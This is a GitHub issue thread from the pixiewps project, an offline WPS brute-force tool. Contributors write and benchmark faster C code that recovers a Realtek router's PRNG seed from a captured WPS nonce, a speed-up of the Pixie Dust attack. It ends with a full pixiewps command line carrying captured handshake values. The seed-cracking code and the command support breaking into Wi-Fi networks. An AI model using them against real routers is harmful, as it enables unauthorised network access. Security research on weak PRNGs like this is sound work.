wiire-a / pixiewps

An offline Wi-Fi Protected Setup brute-force utility

Performance improvement for the Realtek PRNG. #88

Closed 1yura closed 6 years ago

1yura commented 6 years ago

I found a way to improve the performance of the Realtek PRNG.

static const uint32_t realtek_fast_table[3 + 31] = {0x128e83b, 0xdafa31, 0x9f4828, 0xf66443, 0xbee24d, 0x817005, 0xcb918f, 0xa64845, 0x69c3cf, 0xa76dbd, 0x90a848, 0x57025f, 0x89126c, 0x7d9a8f, 0x48252a, 0x6fb2d4, 0x6ccc15, 0x3c5744, 0x5a998f, 0x5df917, 0x32ed77, 0x492688, 0x50e901, 0x2b5f57, 0x3acd0b, 0x456b7a, 0x25413d, 0x2f11f4, 0x3b564d, 0x203f14, 0x2589fc, 0x3283f8, 0x1c17e4, 0x1dd823};

static inline void realtek_fast_produce_nonce(uint32_t seed, uint8_t *dest){ // converts a seed into a nonce; completely replaces srandom_r() and random_r(); seed != 0
    uint32_t word0 = 0, word1 = 0, word2 = 0, word3 = 0;

    for (int j = 0; j < 31; j++) {
        word0 += seed * realtek_fast_table[j + 3];
        word1 += seed * realtek_fast_table[j + 2];
        word2 += seed * realtek_fast_table[j + 1];
        word3 += seed * realtek_fast_table[j + 0];
        seed = (uint32_t) (((uint64_t)16807 * seed) % 2147483647);
    }
    word0 = htonl(word0 >> 1); memcpy(dest + 0,  &word0, 4);
    word0 = htonl(word1 >> 1); memcpy(dest + 4,  &word0, 4);
    word0 = htonl(word2 >> 1); memcpy(dest + 8,  &word0, 4);
    word0 = htonl(word3 >> 1); memcpy(dest + 12, &word0, 4);
}

static uint32_t realtek_fast_prepare_sample(uint8_t *nonce) { // extract the first quarter (4 bytes) of the nonce for testing
    uint32_t res;
    memcpy(&res, nonce, sizeof(res));
    return ntohl(res);
}

static inline int realtek_fast_test_seed(uint32_t seed, uint32_t sample){ // test against the first quarter of the nonce; on a match the whole nonce must be checked; seed != 0
    uint32_t word0 = 0;

    for (int j = 0; j < 31; j++) {
        word0 += seed * realtek_fast_table[j + 3];
        seed = (uint32_t) (((uint64_t)16807 * seed) % 2147483647);
    }
    word0 = word0 >> 1;
    return sample == word0 ? ret_ok : ret_fail;
}

And an example of how to use these functions:

uint32_t sample = realtek_fast_prepare_sample(wps->e_nonce);
int seed_found = 0;
for (uint32_t seed = 1; seed < 0xffffffff; seed++) {
    if (realtek_fast_test_seed(seed, sample) != ret_ok) {
        continue;
    }
    uint8_t test_nonce[WPS_NONCE_LEN];
    realtek_fast_produce_nonce(seed, test_nonce);
    if(memcmp(wps->e_nonce, test_nonce, WPS_NONCE_LEN) == 0) {
        seed_found = 1;
        break;
    }
}

It works about 5 times faster than the srandom_r() + random_r() chain. I have not tested it on a big-endian CPU.

Edit: added syntax coloring (wiire-a)

wiire-a commented 6 years ago

Thank you again for your contribution. I will test as soon as I have some spare time :)

The modulo operator is quite slow:

seed = (uint32_t) (((uint64_t)16807 * seed) % 2147483647);

can be substituted with this (should be ~30% faster):

const uint64_t p = 16807ULL * seed;
const uint64_t m = (p >> 31) + (p & 0x7fffffff);
seed = (uint32_t)((m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m);

See glibc_random_lazy.c#L56.

1yura commented 6 years ago

I did not notice that you had replaced srandom_r() :)

wiire-a commented 6 years ago

Added the new code (7738fda).

I simplified the code a bit, e.g. removing the htonl() calls and the % 2147483647 parts.

On my x86 machine it's about 60% faster, but my commit aimed for a quick and simple integration with the existing code. Some further testing and tweaking could be useful.

1yura commented 6 years ago

In the loop for (int j = 0; j < 31; j++), the last calculation of seed (when j == 30) is useless.

wiire-a commented 6 years ago

Yes. I think the code could be re-written this way:

static inline uint32_t glibc_fast_seed(uint32_t seed)
{
    uint32_t word0 = 0;

    for (int j = 3; j < 31 + 3 - 1; j++) {
        word0 += seed * glibc_seed_tbl[j];

        /* This does: seed = (16807LL * seed) % 0x7fffffff
           using the sum of digits method which works for mod N, base N+1 */
        const uint64_t p = 16807ULL * seed; // Seed is always positive (31 bits)
        seed = (p >> 31) + (p & 0x7fffffff);
    }
    return (word0 + seed * glibc_seed_tbl[33]) >> 1;
}

The variable seed is always positive, thus the multiplication 16807ULL * seed is 63 bits or less, and after the first shift (p >> 31) the top bits are always 0. So the second part:

/* The result might still not fit in 31 bits, if not, repeat
    (conditional seems to make it slightly faster) */
seed = (m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m;

is useless.

Maybe you can confirm that.

BTW, if you want to come back to the IRC channel, we can discuss these things there. I know that @rofl0r can be a bit annoying but bear with him ;)

wiire-a commented 6 years ago

Pushed the new changes (7acd739). On my laptop now the difference is much more noticeable compared to my old code: 4 times faster.

1yura commented 6 years ago

> seed = (m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m; is useless. Maybe you can confirm that.

Not confirmed. For example, with seed 5951 glibc_fast_seed() gets a wrong result. I don't know why. With seed = (m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m; everything is OK.

1yura commented 6 years ago

A constantly running messenger distracts me, but when there is something to discuss I will join. And about whether ralink_random() can produce any value or not: it can, I checked :)

1yura commented 6 years ago

I found something interesting: with seed = 0xfffffffe, the function with seed = (uint32_t) (((uint64_t)16807 * seed) % 2147483647); produces the correct nonce. But the function with

        const uint64_t p = 16807ULL * seed;
        const uint64_t m = (p >> 31) + (p & 0x7fffffff);
        seed = (uint32_t)((m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m);

produces a wrong nonce.

amiinebh commented 6 years ago

Just tested this and the difference is noticeable. Thank you @1yura for your contribution. Just like the Ralink optimization, the code is now way faster. Great work @wiire-a @1yura

1yura commented 6 years ago

Upd. Try this fast function: https://0x0.st/sNXM.c. The output must be compared with the lower 7 bits of the first (32-bit) word of the nonce.

wiire-a commented 6 years ago

Will do soon.

At the time I added the conditional because it seemed to be faster that way. In this function, however, it seems to make it noticeably slower, so I guess we should replace:

const uint64_t p = 16807ULL * seed;
const uint64_t m = (p >> 31) + (p & 0x7fffffff);
seed = (m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m;

with this:

uint64_t p = 16807ULL * seed;
p = (p >> 31) + (p & 0x7fffffff);
seed = (p >> 31) + (p & 0x7fffffff);

In the current code negative values are never tested, since the seed always corresponds to the current time, which is always positive. So I wouldn't add the check:

seed = (seed == 0x7fffffff || seed == 0xfffffffe) ? 0 : seed;

which only slows down the cracking process.

If the current time is not retrieved from the router, the value of 0 (Unix Epoch) is returned. But with seed = 0 the PRNG would only ever produce 0. So internally the PRNG checks whether seed == 0 and, if so, changes it to 1; see glibc_random_old.c#L93:

/* We must make sure the seed is not 0. Take arbitrarily 1 in this case. */
if (seed == 0)
    seed = 1;

The value of 0x7fffffff would be OK, but it represents 03:14:07 of January 19th, 2038 (UTC). In practice it's never tested unless the user passes --end/start 02/2038. But honestly I wouldn't worry about it.

wiire-a commented 6 years ago

What's the purpose of doing:

REALTEK_FAST_SEED_STEP

over and over again, if the seed doesn't change?

1yura commented 6 years ago

It updates the seed :)

#define REALTEK_FAST_SEED_STEP \
    p = 16807ULL * seed; \
    m = (p >> 31) + (p & 0x7fffffff); \
    seed = (uint32_t)((m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m);

wiire-a commented 6 years ago

Old:

       2242.215146      task-clock (msec)         #    3.727 CPUs utilized          
               217      context-switches          #    0.097 K/sec                  
                 3      cpu-migrations            #    0.001 K/sec                  
               140      page-faults               #    0.062 K/sec                  
     5,116,201,317      cycles                    #    2.282 GHz                      (83.45%)
        64,305,319      stalled-cycles-frontend   #    1.26% frontend cycles idle     (83.54%)
     2,728,813,181      stalled-cycles-backend    #   53.34% backend cycles idle      (33.12%)
     8,297,312,960      instructions              #    1.62  insn per cycle         
                                                  #    0.33  stalled cycles per insn  (50.20%)
       556,638,317      branches                  #  248.254 M/sec                    (66.95%)
         4,441,275      branch-misses             #    0.80% of all branches          (83.47%)

       0.601541662 seconds time elapsed

New:

       2267.696976      task-clock (msec)         #    3.741 CPUs utilized          
               227      context-switches          #    0.100 K/sec                  
                 2      cpu-migrations            #    0.001 K/sec                  
               141      page-faults               #    0.062 K/sec                  
     5,179,056,557      cycles                    #    2.284 GHz                      (83.62%)
        17,023,000      stalled-cycles-frontend   #    0.33% frontend cycles idle     (83.18%)
     3,291,806,179      stalled-cycles-backend    #   63.56% backend cycles idle      (33.36%)
     6,936,919,663      instructions              #    1.34  insn per cycle         
                                                  #    0.47  stalled cycles per insn  (51.10%)
        80,430,879      branches                  #   35.468 M/sec                    (67.60%)
           320,102      branch-misses             #    0.40% of all branches          (83.81%)

       0.606194954 seconds time elapsed

It doesn't really change anything for me. Even if you unroll or remove the for loop, the instructions are still executed sequentially since one depends on the other.

For example:

REALTEK_FAST_SEED_STEP
b += realtek_fast_lookup_4d[(uint8_t)seed]; /* must wait for the operation above to finish (seed is shared) */

REALTEK_FAST_SEED_STEP                      /* must wait for the operation above to finish (seed is shared) */
b += realtek_fast_lookup_5[(uint8_t)seed];  /* must wait for the operation above to finish (seed is shared) */

If instead we'd have something like:

for (...) {
    // ...
    independent_operation_A();
    independent_operation_B();
    // ...
}

those two could execute in parallel, as long as they didn't share the same variables (seed in our case).

Also, the most expensive operation is the modulo (%) or its variant in REALTEK_FAST_SEED_STEP; a precomputed table should perhaps aim at avoiding or reducing that.

wiire-a commented 6 years ago

I pushed the changes to fix my previous commit so we have the same starting point to judge optimizations and modifications.

Maybe another consideration that could be useful is the fact that we test the seeds in sequence:

seed
seed + 1
seed + 2
...

or, backwards

seed
seed - 1
seed - 2
...

Not sure if this helps, but if it did we could set up some intermediate table(s), e.g. initstate_table(seed).

I'm just throwing out ideas. I'm still not sure I understand what you did with your changes :)

1yura commented 6 years ago

I have no more ideas. It should be noted that the nonce -> seed mapping is always fixed, therefore those for whom speed is important can use lookup tables. The full table is 16 GB, the optimized one is 8 GB. Or rainbow tables.

wiire-a commented 6 years ago

We've come a long way. A simple benchmark over a 3-year period (--start 2017 --end 2014) on my laptop:

| version | -j 1 | -j 4 | PRNG |
|---|---|---|---|
| 1.3.0 | 108 s 362 ms | - | old |
| pre-1.4.0 | 76 s 534 ms | 29 s 818 ms | old optimized |
| 1.4.1 | 27 s 105 ms | 9 s 221 ms | lazy |
| git | 8 s 909 ms | 3 s 109 ms | yura |

Obviously the difference is less noticeable on a faster machine (e.g. my Desktop).

There will be a new release soon. Thank you :)

Data used:

./pixiewps -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -r 89:90:3d:aa:c7:52:5a:3e:33:c5:b8:33:a3:1d:bf:a5:3c:95:d4:d4:6f:4c:1b:f5:3f:9b:e8:77:47:d8:72:7b:a9:46:85:f6:83:4b:6a:11:d0:6d:1d:5b:5f:af:70:32:02:4e:f9:d7:5c:bb:45:d8:03:eb:b2:ea:5d:c7:b2:a8:05:9d:f3:7e:93:be:97:c4:d6:60:11:cc:fc:9a:d3:21:f3:b9:4b:5b:79:ae:5d:31:66:3d:7c:41:42:31:df:5a:62:64:70:97:ae:7a:7a:57:43:13:71:01:cc:80:df:c0:7d:45:2e:e6:5d:92:8f:22:28:6c:53:f6:4f:5e:f8:aa:bf:21:4b:c6:9e:37:74:86:37:f2:07:6b:26:b9:7a:6f:50:86:6e:2a:80:3a:5a:e4:0f:d3:9e:50:12:4e:86:38:05:38:c6:34:1a:b7:8a:8a:13:f9:19:f9:61:c0:75:b7:2c:9a:1d:21:d5:5c:14:e7:50:94:c8:53:a8:4d:0f:06 -s d1:61:6f:47:df:93:d1:94:80:ec:a1:23:3c:7b:0b:1e:7a:b7:c4:09:a8:b8:20:87:cb:26:89:d4:d5:34:e3:21 -z 11:58:69:bd:7c:9d:3a:8c:18:e9:b1:04:bc:2e:85:a2:39:fb:12:cd:b3:a0:a5:c5:95:88:08:1d:fb:d7:92:a7 -a 77:e6:24:e3:4f:d1:8e:57:48:a2:88:de:ee:88:0e:14:bc:8e:9e:c8:4b:eb:14:ec:9e:8b:cb:d5:d6:6d:79:97 -n 4b:86:6f:2e:76:49:21:ce:56:c2:93:63:3c:b5:a0:b5